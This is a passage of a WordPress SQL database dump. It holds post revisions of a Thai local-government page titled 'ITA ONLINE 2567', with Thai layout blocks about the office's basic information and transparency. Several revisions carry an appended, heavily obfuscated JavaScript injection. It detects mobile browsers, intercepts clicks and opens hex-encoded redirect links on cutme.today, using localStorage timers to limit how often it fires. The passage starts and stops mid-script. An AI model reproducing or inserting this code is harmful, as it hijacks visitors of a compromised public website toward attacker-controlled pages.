|nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ITA ONLINE 2567','','inherit','closed','closed','','871-revision-v1','','','2024-08-19 12:09:32','2024-08-19 05:09:32','',871,'http://pakhaeng.ssk.in.th/?p=872',0,'revision','',0),
(874,1,'2024-08-19 12:12:17','2024-08-19 05:12:17','<!-- wp:generateblocks/container {\"uniqueId\":\"74e53c05\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"608409cd\",\"blockVersion\":3} -->\n<h2 class=\"gb-headline gb-headline-608409cd gb-headline-text\"><strong>ข้อมูลพื้นฐาน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:kadence/iconlist {\"uniqueID\":\"871_db0f60-10\",\"icon\":\"fe_arrowRight\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_db0f60-10 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_f0fbcd-0d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_f0fbcd-0d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">โครงสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_f19143-44\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_f19143-44\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_a70426-ef\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_a70426-ef\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">อำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ITA ONLINE 2567','','inherit','closed','closed','','871-revision-v1','','','2024-08-19 12:12:17','2024-08-19 05:12:17','',871,'http://pakhaeng.ssk.in.th/?p=874',0,'revision','',0),
(876,1,'2024-08-19 12:21:24','2024-08-19 05:21:24','<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"layout\":\"vtabs\",\"currentTab\":7,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"var(\\u002d\\u002dglobal-palette4, #2D3748)\",\"titleColorHover\":\"var(\\u002d\\u002dglobal-palette3, #1A202C)\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBgHover\":\"var(\\u002d\\u002dglobal-palette8, #F7FAFC)\",\"titleBgActive\":\"#0a6689\",\"titleBorder\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderHover\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"size\":1.1,\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"400\"} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-7 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_a471bf-67\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_a471bf-67\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_a3f15d-d7\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_a3f15d-d7\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"_bcc767-12\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab_bcc767-12\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"_e603b6-8d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab_e603b6-8d\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"_ff999a-98\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab_ff999a-98\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"_387c35-4e\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab_387c35-4e\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"_ea5a2e-14\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab_ea5a2e-14\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"74e53c05\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"608409cd\",\"blockVersion\":3} -->\n<h2 class=\"gb-headline gb-headline-608409cd gb-headline-text\"><strong>ข้อมูลพื้นฐาน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:kadence/iconlist {\"uniqueID\":\"871_db0f60-10\",\"icon\":\"fe_arrowRight\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_db0f60-10 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_f0fbcd-0d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_f0fbcd-0d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">โครงสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_f19143-44\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_f19143-44\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_a70426-ef\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_a70426-ef\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">อำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 